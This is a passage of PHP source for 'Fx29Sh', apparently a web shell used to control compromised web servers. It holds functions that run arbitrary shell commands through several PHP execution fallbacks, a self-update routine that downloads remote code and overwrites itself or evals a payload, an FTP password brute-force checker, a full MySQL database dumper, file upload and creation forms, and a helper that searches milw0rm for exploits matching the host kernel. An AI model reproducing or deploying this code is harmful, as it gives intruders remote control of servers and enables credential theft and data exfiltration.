2540 document.forms.fphpfsys.A1.type = "hidden";
2541 }
2542 if (num<=1) {
2543 document.forms.fphpfsys.arg2.type = "hidden";
2544 document.forms.fphpfsys.A2.type = "hidden";
2545 }
2546 if (num==2) {
2547 document.forms.fphpfsys.A1.type = "label";
2548 document.forms.fphpfsys.A2.type = "label";
2549 document.forms.fphpfsys.arg1.type = "text";
2550 document.forms.fphpfsys.arg2.type = "text";
2551 }
2552 document.forms.fphpfsys.A1.value = txt1 + ":";
2553 document.forms.fphpfsys.A2.value = txt2 + ":";
2554 }
2555 </script>
2556 <form name="fphpfsys" method="POST">
2557 <input type="hidden" name="act" value="phpfsys">
2558 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2559 <select name="phpfsysfunc">
2560<?php
2561foreach ($phpfsaliases as $als) {
2562 if ($als[1]==@$phpfsysfunc) {
2563 echo "\t\t<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\n";
2564 }
2565 else {
2566 echo "\t\t<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','".@$als[4]."')\">".$als[0]."</option>\n";
2567 }
2568}
2569?>
2570 </select>
2571 <input type="label" name="A1" value="File:" size=2 disabled>
2572 <input type=text name=arg1 size=40 value="<?php echo @htmlspecialchars($arg1); ?>">
2573 <input type="hidden" name="A2" size=3 disabled >
2574 <input type="hidden" name="arg2" size=40 value="<?php echo @htmlspecialchars($arg2); ?>">
2575 <input type="submit" name="submit" value="Execute">
2576 </form>
2577 </td></tr>
2578 <tr><td>
2579<?php
2580foreach ($sh_sourcez as $e => $o) {
2581 echo "\t<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\n";
2582}
2583?>
2584 </td></tr>
2585
2586 <tr><th rowspan="4">Filesystem</th>
2587 <th>Search:</th>
2588 <td>
2589 <form name="f_search" method="POST">
2590 <input type="hidden" name="act" value="search">
2591 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2592 <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
2593 </form>
2594 </td></tr>
2595 <tr><th>Upload:</th>
2596 <td>
2597 <form name="f_upload" method="POST" enctype="multipart/form-data">
2598 <input type="hidden" name="act" value="upload">
2599 <input type="file" name="uploadfile" size="50">
2600 <input type="submit" name="submit" value="Upload">
2601 <?php echo " Max size: ".@ini_get("upload_max_filesize")."B | Temp dir: ".@ini_get("upload_tmp_dir")."\n"; ?>
2602 </form>
2603 </td></tr>
2604 <tr><th>Create:</th>
2605 <td>
2606 <form name="f_mkfile" method="POST">
2607 <input type="hidden" name="act" value="mkfile">
2608 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2609 <input type="hidden" name="ft" value="edit">
2610 <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create">
2611 </form>
2612 </td></tr>
2613 <tr><th>View:</th><td>
2614 <form name="f_gofile" method="POST">
2615 <input type="hidden" name="act" value="gofile">
2616 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2617 <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type="submit" value="View">
2618 </form>
2619 </td></tr>
2620</table>
2621
2622 <div class="bartitle footer"><?php echo html_footer(); ?></div>
2623
2624</div>
2625<!-- End of Commands Panel -->
2626
2627</center></body>
2628
2629</html>
2630<?php
2631
2632########################
2633##[ Fx29Sh FUNCTIONS ]##
2634########################
2635function safemode() {
2636 if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
2637 else { return FALSE; }
2638}
2639function getdisfunc() {
2640 $disfunc = @ini_get("disable_functions");
2641 if (!empty($disfunc)) {
2642 $disfunc = str_replace(" ","",$disfunc);
2643 $disfunc = explode(",",$disfunc);
2644 }
2645 else { $disfunc= array(); }
2646 return $disfunc;
2647}
2648function enabled($func) {
2649 if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
2650 else { return FALSE; }
2651}
2652##[ FX29EXEC W/ STDERR ]##
2653function fx29exec($cmd) {
2654 $output = "";
2655 if ( enabled("popen") ) {
2656 $h = popen($cmd.' 2>&1', 'r');
2657 if ( is_resource($h) ) {
2658 while ( !feof($h) ) { $output .= fread($h, 2096); }
2659 pclose($h);
2660 }
2661 }
2662 elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2663 elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2664 elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2665 elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2666 return $output;
2667}
2668##[ FX29EXEC W/O STDERR ]##
2669function fx29exec2($cmd) {
2670 $output = "";
2671 if ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2672 elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2673 elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } #Dipindahkan kesini karena menimbulkan masalah pada output control
2674 elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2675 elseif ( enabled("popen") ) {
2676 $h = popen($cmd.' 2>&1', 'r');
2677 if ( is_resource($h) ) {
2678 while ( !feof($h) ) { $output .= fread($h, 2096); }
2679 pclose($h);
2680 }
2681 }
2682 return $output;
2683}
2684function is_windows() { return strtolower(substr(PHP_OS,0,3)) == "win"; }
2685function which($pr) {
2686 $path = fx29exec("which $pr");
2687 if(!empty($path)) { return $path; } else { return $pr; }
2688}
2689function get_status() {
2690 $arrfunc = array(
2691 array("MySQL","mysql_connect"),
2692 array("MSSQL","mssql_connect"),
2693 array("Oracle","ocilogon"),
2694 array("PostgreSQL","pg_connect"),
2695 array("Curl","curl_version"),
2696 );
2697 $arrcmd = array(
2698 array("Fetch","fetch --help"),
2699 array("Wget","wget --help"),
2700 array("Perl","perl -v"),
2701 );
2702
2703 $statinfo = array();
2704
2705 function showstat($sup,$stat) {
2706 if ($stat == "on") { return "$sup: <font class=on>ON</font>"; }
2707 else { return "$sup: <font class=off>OFF</font>"; }
2708 }
2709
2710 foreach ($arrfunc as $func) {
2711 if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
2712 else { $statinfo[] = showstat($func[0],"off"); }
2713 }
2714 $statinfo[] = (@extension_loaded('sockets')) ? showstat("Sockets","on") : showstat("Sockets","off");
2715 foreach ($arrcmd as $cmd) {
2716 if (fx29exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
2717 else { $statinfo[] = showstat($cmd[0],"off"); }
2718 }
2719 return implode(" ",$statinfo);
2720}
2721function showdisfunc() {
2722 $disfunc = getdisfunc();
2723 if ($disfunc = @ini_get("disable_functions")) {
2724 return '<font class="off">'.$disfunc.'</font>';
2725 }
2726 else { return '<font class="on">NONE</font>'; }
2727}
2728function disp_drives($curdir,$surl) {
2729 $letters = "";
2730 $v = explode("\\",$curdir);
2731 $v = $v[0];
2732 foreach (range("A","Z") as $letter) {
2733 $bool = $isdiskette = $letter == "A";
2734 if (!$bool) { $bool = is_dir($letter.":\\"); }
2735 if ($bool) {
2736 $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
2737 ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
2738 if ($letter.":" != $v) { $letters .= $letter; }
2739 else { $letters .= "<font color=#3366FF>".$letter."</font>"; }
2740 $letters .= " </a> ";
2741 }
2742 }
2743 if (!empty($letters)) { Return $letters; }
2744 else { Return "None"; }
2745}
2746function view_size($size) {
2747 if (!is_numeric($size)) { return FALSE; }
2748 else {
2749 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
2750 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
2751 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
2752 else {$size = $size . " B";}
2753 return $size;
2754 }
2755}
2756function disp_freespace($curdrv) {
2757 $free = @disk_free_space($curdrv);
2758 $total = @disk_total_space($curdrv);
2759 if ($free === FALSE) { $free = 0; }
2760 if ($total === FALSE) { $total = 0; }
2761 if ($free < 0) { $free = 0; }
2762 if ($total < 0) { $total = 0; }
2763 $used = $total-$free;
2764 $free_percent = round(100/($total/$free),2)."%";
2765 $free = view_size($free);
2766 $total = view_size($total);
2767 return "$free of $total ($free_percent)";
2768}
2769##[ Fx29Sh UPDATE FUNCTIONS ]##
2770function fx29sh_getupdate($update = FALSE) {
2771 global $fx29sh_updateurl;
2772 $url = $fx29sh_updateurl."?version=".urlencode(base64_encode(sh_ver));
2773 $data = @file_get_contents($url);
2774 if (!$data) { return "<div class=errmsg>Can't connect to update-server! ($fx29sh_updateurl)</div>"; }
2775 else {
2776 $data = ltrim($data);
2777 if ($data{0} == "\x99" and $data{1} == "\x01") { return "You already using latest version!"; }
2778 if ($data{0} == "\x99" and $data{1} == "\x02") {
2779 $string = substr($data,3,ord($data{2}));
2780 $string = explode("|",$string);
2781 if ($update) {
2782 $confvars = array();
2783 $sourceurl = $string[0];
2784 $source = @file_get_contents($sourceurl);
2785 if (!$source) { return "Can't fetch update!"; }
2786 else {
2787 $fp = @fopen(__FILE__,"w");
2788 if (!$fp) { return "Local error: can't write update to ".__FILE__."! You may download fx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>."; }
2789 else {
2790 fwrite($fp,$source);
2791 fclose($fp);
2792 return "Update completed!";
2793 }
2794 }
2795 }
2796 else { return "New version is available: ".$string[1]; }
2797 }
2798 elseif ($data{0} == "\x99" and $data{1} == "\x03") { eval($string); return TRUE; }
2799 else { return "<div class=errmsg>Error in protocol: segmentation failed! (".$data.")</div>"; }
2800 }
2801}
2802##[ END Fx29Sh UPDATE FUNCTIONS ]##
2803function fx29_buff_prepare() {
2804 global $sess_data, $act;
2805 foreach ($sess_data["copy"] as $k=>$v) {
2806 $sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
2807 }
2808 foreach ($sess_data["cut"] as $k=>$v) {
2809 $sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
2810 }
2811 $sess_data["copy"] = array_unique($sess_data["copy"]);
2812 $sess_data["cut"] = array_unique($sess_data["cut"]);
2813 sort($sess_data["copy"]);
2814 sort($sess_data["cut"]);
2815 if ($act != "copy") {
2816 foreach ($sess_data["cut"] as $k=>$v) {
2817 if ($sess_data["copy"][$k] == $v) { unset($sess_data["copy"][$k]); }
2818 }
2819 }
2820 else {
2821 foreach ($sess_data["copy"] as $k=>$v) {
2822 if ($sess_data["cut"][$k] == $v) { unset($sess_data["cut"][$k]); }
2823 }
2824 }
2825}
2826function fx29_sess_put($data) {
2827 global $sess_cookie;
2828 global $sess_data;
2829 fx29_buff_prepare();
2830 $sess_data = $data;
2831 $data = serialize($data);
2832 setcookie($sess_cookie,$data);
2833}
2834##[ FILESYSTEM FUNCTIONS ]##
2835function fs_copy_dir($d,$t) {
2836 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2837 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2838 $h = opendir($d);
2839 while (($o = readdir($h)) !== FALSE) {
2840 if (($o != ".") and ($o != "..")) {
2841 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2842 else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2843 if (!$ret) {return $ret;}
2844 }
2845 }
2846 closedir($h);
2847 return TRUE;
2848}
2849function fs_copy_obj($d,$t) {
2850 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2851 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
2852 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
2853 if (is_dir($d)) {
2854 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2855 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
2856 return fs_copy_dir($d,$t);
2857 }
2858 elseif (is_file($d)) { return copy($d,$t); }
2859 else { return FALSE; }
2860}
2861function fs_move_dir($d,$t) {
2862 $h = opendir($d);
2863 if (!is_dir($t)) {mkdir($t);}
2864 while (($o = readdir($h)) !== FALSE) {
2865 if (($o != ".") and ($o != "..")) {
2866 $ret = TRUE;
2867 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2868 else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
2869 if (!$ret) {return $ret;}
2870 }
2871 }
2872 closedir($h);
2873 return TRUE;
2874}
2875function fs_move_obj($d,$t) {
2876 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2877 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
2878 if (is_dir($d)) {
2879 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2880 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
2881 return fs_move_dir($d,$t);
2882 }
2883 elseif (is_file($d)) {
2884 if(copy($d,$t)) {return unlink($d);}
2885 else {unlink($t); return FALSE;}
2886 }
2887 else {return FALSE;}
2888}
2889function fs_rmdir($d) {
2890 $h = opendir($d);
2891 while (($o = readdir($h)) !== FALSE) {
2892 if (($o != ".") and ($o != "..")) {
2893 if (!is_dir($d.$o)) {unlink($d.$o);}
2894 else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
2895 }
2896 }
2897 closedir($h);
2898 rmdir($d);
2899 return !is_dir($d);
2900}
2901function fs_rmobj($o) {
2902 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
2903 if (is_dir($o)) {
2904 if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
2905 return fs_rmdir($o);
2906 }
2907 elseif (is_file($o)) {return unlink($o);}
2908 else {return FALSE;}
2909}
2910##[ END FILESYSTEM FUNCTIONS ]##
2911##[ FX29SH EXIT FUNCTIONS ]##
2912function fx29shexit() {
2913 global $gzipencode,$ft;
2914 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
2915 $v = @ob_get_contents();
2916 @ob_end_clean();
2917 @ob_start("ob_gzHandler");
2918 echo $v;
2919 @ob_end_flush();
2920 }
2921 exit;
2922}
2923##[ END OF FX29SH EXIT FUNCTIONS ]##
2924function fx29fsearch($d) {
2925 global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
2926 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2927 $h = opendir($d);
2928 while (($f = readdir($h)) !== FALSE) {
2929 if($f != "." && $f != "..") {
2930 $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
2931 if (is_dir($d.$f)) {
2932 $search_i_d++;
2933 if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
2934 if (!is_link($d.$f)) { fx29fsearch($d.$f); }
2935 }
2936 else {
2937 $search_i_f++;
2938 if ($bool) {
2939 if (!empty($a["text"])) {
2940 $r = @file_get_contents($d.$f);
2941 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
2942 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
2943 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
2944 else {$bool = strpos(" ".$r,$a["text"],1);}
2945 if ($a["text_not"]) {$bool = !$bool;}
2946 if ($bool) {$found[] = $d.$f; $found_f++;}
2947 }
2948 else {$found[] = $d.$f; $found_f++;}
2949 }
2950 }
2951 }
2952 }
2953 closedir($h);
2954}
2955function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
2956function view_perms_color($o) {
2957 if (!is_readable($o)) { return "<font class=red>".view_perms(fileperms($o))."</font>"; }
2958 elseif (!is_writable($o)) { return "<font color=white>".view_perms(fileperms($o))."</font>"; }
2959 else { return "<font color=green>".view_perms(fileperms($o))."</font>"; }
2960}
2961function view_perms($mode) {
2962 if (($mode & 0xC000) === 0xC000) {$type = "s";}
2963 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
2964 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
2965 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
2966 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
2967 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
2968 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
2969 else {$type = "?";}
2970 $owner["read"] = ($mode & 00400)?"r":"-";
2971 $owner["write"] = ($mode & 00200)?"w":"-";
2972 $owner["execute"] = ($mode & 00100)?"x":"-";
2973 $group["read"] = ($mode & 00040)?"r":"-";
2974 $group["write"] = ($mode & 00020)?"w":"-";
2975 $group["execute"] = ($mode & 00010)?"x":"-";
2976 $world["read"] = ($mode & 00004)?"r":"-";
2977 $world["write"] = ($mode & 00002)? "w":"-";
2978 $world["execute"] = ($mode & 00001)?"x":"-";
2979 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
2980 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
2981 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
2982 return $type.join("",$owner).join("",$group).join("",$world);
2983}
2984function parsesort($sort) {
2985 $one = intval($sort);
2986 $second = substr($sort,-1);
2987 if ($second != "d") {$second = "a";}
2988 return array($one,$second);
2989}
2990function parse_perms($mode) {
2991 if (($mode & 0xC000) === 0xC000) {$t = "s";}
2992 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
2993 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
2994 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
2995 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
2996 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
2997 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
2998 else {$t = "?";}
2999 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
3000 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
3001 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
3002 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
3003}
3004function str2mini($content,$len) {
3005 if (strlen($content) > $len) {
3006 $len = ceil($len/2) - 2;
3007 return substr($content, 0,$len)."...".substr($content,-$len);
3008 } else { return $content; }
3009}
3010function strips(&$arr,$k="") {
3011 if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
3012 else { $arr = stripslashes($arr); }
3013}
3014function getmicrotime() {
3015 list($usec, $sec) = explode(" ", microtime());
3016 return ((float)$usec + (float)$sec);
3017}
3018function milw0rm() {
3019 $Lversion = php_uname("r");
3020 $OSV = php_uname("s");
3021 if(eregi("Linux",$OSV)) {
3022 $Lversion = substr($Lversion,0,6);
3023 return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
3024 } else {
3025 $Lversion = substr($Lversion,0,3);
3026 return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
3027 }
3028}
3029function fx29ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
3030 if ($fqb_onlywithsh) { $TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin"))); }
3031 else { $TRUE = TRUE; }
3032 if ($TRUE) {
3033 $sock = @ftp_connect($host,$port,$timeout);
3034 if (@ftp_login($sock,$login,$pass)) {
3035 echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
3036 @ob_flush();
3037 return TRUE;
3038 }
3039 }
3040}
3041##[ MySQL FUNCTIONS ]##
3042function mysql_dump($set) {
3043 $sock = $set["sock"];
3044 $db = $set["db"];
3045 $print = $set["print"];
3046 $nl2br = $set["nl2br"];
3047 $file = $set["file"];
3048 $add_drop = $set["add_drop"];
3049 $tabs = $set["tabs"];
3050 $onlytabs = $set["onlytabs"];
3051 $ret = array();
3052 $ret["err"] = array();
3053 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
3054 if (empty($db)) {$db = "db";}
3055 if (empty($print)) {$print = 0;}
3056 if (empty($nl2br)) {$nl2br = 0;}
3057 if (empty($add_drop)) {$add_drop = TRUE;}
3058 if (empty($file)) {
3059 $file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
3060 }
3061 if (!is_array($tabs)) {$tabs = array();}
3062 if (empty($add_drop)) {$add_drop = TRUE;}
3063 if (sizeof($tabs) == 0) {
3064 #Retrieve tables-list
3065 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
3066 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
3067 }
3068 $out = "
3069 # Dumped by ".sh_name()."
3070 # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
3071 # Date: ".date("d.m.Y H:i:s")."
3072 # DB: \"".$db."\"
3073 #---------------------------------------------------------";
3074 $c = count($onlytabs);
3075 foreach($tabs as $tab) {
3076 if ((in_array($tab,$onlytabs)) or (!$c)) {
3077 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
3078 #Receieve query for create table structure
3079 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
3080 if (!$res) {$ret["err"][] = mysql_smarterror();}
3081 else {
3082 $row = mysql_fetch_row($res);
3083 $out .= $row["1"].";\n\n";
3084 #Receieve table variables
3085 $res = mysql_query("SELECT * FROM `$tab`", $sock);
3086 if (mysql_num_rows($res) > 0) {
3087 while ($row = mysql_fetch_assoc($res)) {
3088 $keys = implode("`, `", array_keys($row));
3089 $values = array_values($row);
3090 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
3091 $values = implode("', '", $values);
3092 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
3093 $out .= $sql;
3094 }
3095 }
3096 }
3097 }
3098 }
3099 $out .= "#---------------------------------------------------------------------------------\n\n";
3100 if ($file) {
3101 $fp = fopen($file, "w");
3102 if (!$fp) {$ret["err"][] = 2;}
3103 else {
3104 fwrite ($fp, $out);
3105 fclose ($fp);
3106 }
3107 }
3108 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
3109 return $out;
3110}
3111function mysql_buildwhere($array,$sep=" and",$functs=array()) {
3112 if (!is_array($array)) {$array = array();}
3113 $result = "";
3114 foreach($array as $k=>$v) {
3115 $value = "";
3116 if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
3117 $value .= "'".addslashes($v)."'";
3118 if (!empty($functs[$k])) {$value .= ")";}
3119 $result .= "`".$k."` = ".$value.$sep;
3120 }
3121 $result = substr($result,0,strlen($result)-strlen($sep));
3122 return $result;
3123}
3124function mysql_fetch_all($query,$sock) {
3125 if ($sock) {$result = mysql_query($query,$sock);}
3126 else {$result = mysql_query($query);}
3127 $array = array();
3128 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
3129 mysql_free_result($result);
3130 return $array;
3131}
3132function mysql_smarterror($sock) {
3133 if ($sock) { $error = mysql_error($sock); }
3134 else { $error = mysql_error(); }
3135 $error = htmlspecialchars($error);
3136 return $error;
3137}
3138function mysql_query_form() {
3139 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
3140 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
3141 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
3142 if ((!$submit) or ($sql_act)) {
3143 echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
3144 if ($tbl_struct) {
3145 echo "<td valign=\"top\"><b>Fields:</b><br>";
3146 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
3147 echo "</td></tr></table>";
3148 }
3149 }
3150 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
3151}
3152function mysql_create_db($db,$sock="") {
3153 $sql = "CREATE DATABASE `".addslashes($db)."`;";
3154 if ($sock) {return mysql_query($sql,$sock);}
3155 else {return mysql_query($sql);}
3156}
3157function mysql_query_parse($query) {
3158 $query = trim($query);
3159 $arr = explode (" ",$query);
3160 $types = array(
3161 "SELECT"=>array(3,1),
3162 "SHOW"=>array(2,1),
3163 "DELETE"=>array(1),
3164 "DROP"=>array(1)
3165 );
3166 $result = array();
3167 $op = strtoupper($arr[0]);
3168 if (is_array($types[$op])) {
3169 $result["propertions"] = $types[$op];
3170 $result["query"] = $query;
3171 if ($types[$op] == 2) {
3172 foreach($arr as $k=>$v) {
3173 if (strtoupper($v) == "LIMIT") {
3174 $result["limit"] = $arr[$k+1];
3175 $result["limit"] = explode(",",$result["limit"]);
3176 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
3177 unset($arr[$k],$arr[$k+1]);
3178 }
3179 }
3180 }
3181 }
3182 else { return FALSE; }
3183}
3184##[ END OF MYSQL FUNCTIONS ]##
3185
3186##[ IMAGES ]##
3187function imagez() {
3188 $images = array(
3189 "home"=>
3190'R0lGODlhEwAYALMJAH6+91OZ97zp/l6x/Y/V/iVr7DGQ/QwxyAEKpP///wAAAAAAAAAAAAAAAAAA'.
3191'AAAAACH5BAHoAwkALAAAAAATABgAAASoMEkJwrwYAyEqyFkQcFwFTuJAkF1xDkExAARdAy4W4EUw'.
3192'zwAALEfhFQy+5AAWmwwLUIN0OhPlBjLocSpdDgzYBLYnjXa/U1fMQD6auWzxMQBmn0XpBJ6OB6fs'.
3193'cXwiPl5LBwgIdGqDhV4FiImBKV5CQQGQPjlgS0GVMJBfRD5BBDU1l4g+BxcGNqYEAQeHBasYBqW4'.
3194'sLK1IAUcK7onFwWlOMIZB0THyxgRADs=',
3195 "buffer"=>
3196'R0lGODlhGAAWALMJABo+qGql77zK4OPw+pXE9Tx33mOCxx5WzYyv4v///wAAAAAAAAAAAAAAAAAA'.
3197'AAAAACH5BAHoAwkALAAAAAAYABYAAASbMMlJa0LFao0QMZslDMJFEEGhhtPgul4gFwebvK9BICnN'.
3198'4oPOACU7HAAb3Gl4mtGQltfSdSI+AdAWVVlNGbHZmxTYVB3BUOCI2vR+AQaQZL1lz74GhEAgn48I'.
3199'bCg0BwV7ewh9AgSGgEM9ASOGe32NiwFMAY0ukgZhU1WaOHxhE0tTQCR9GksIqHyqG4qnQbAsAkK0'.
3200'NhsFiLq+NhEAOw==',
3201 "search"=>
3202'R0lGODlhGAAXAKIEAHl5ecbGxqCgoOvr6////wAAAAAAAAAAACH5BAHoAwQALAAAAAAYABcAAANq'.
3203'SLq88iK02UIM1kY67fgDhj3c4oGiKJRK9mUpycFpHQClHbw8zl2iEOjlo9SEw1DRuNsliaygMwlY'.
3204'di7PgcDKUD2moW1utAVAHtUS9maGmLkOTBiudrJZk3Uaz4gQ6XUYe3wNb4CEiImKCQA7',
3205 "back"=>
3206'R0lGODlhGAAYALMJAC9ILkesPbHdo3W0Zi2IJ+f141aOUTRoM4LKdP///wAAAAAAAAAAAAAAAAAA'.
3207'AAAAACH5BAHoAwkALAAAAAAYABgAAASwMMlJq7046zSM/8YmeYNgFiZiHMdmCEVszoIaXscLpwhC'.
3208'dy2LASETlAoBXw8xCFYMqNQuWesBK4OjkVgYLL8B52h2LCCS2WxgECAAJiteLNarMtduOEE678/P'.
3209'bW8jBzVefigybIEUQz0BMF0EAZOTkm6CEgCNbFOUngR5FAdLazCAlKChomt3ASiolpiMB5OKbJZt'.
3210'oLIVtJ6VuaoXAAepxbq7GcTFAMgbzM/NItLTGxEAOw==',
3211 "forward"=>
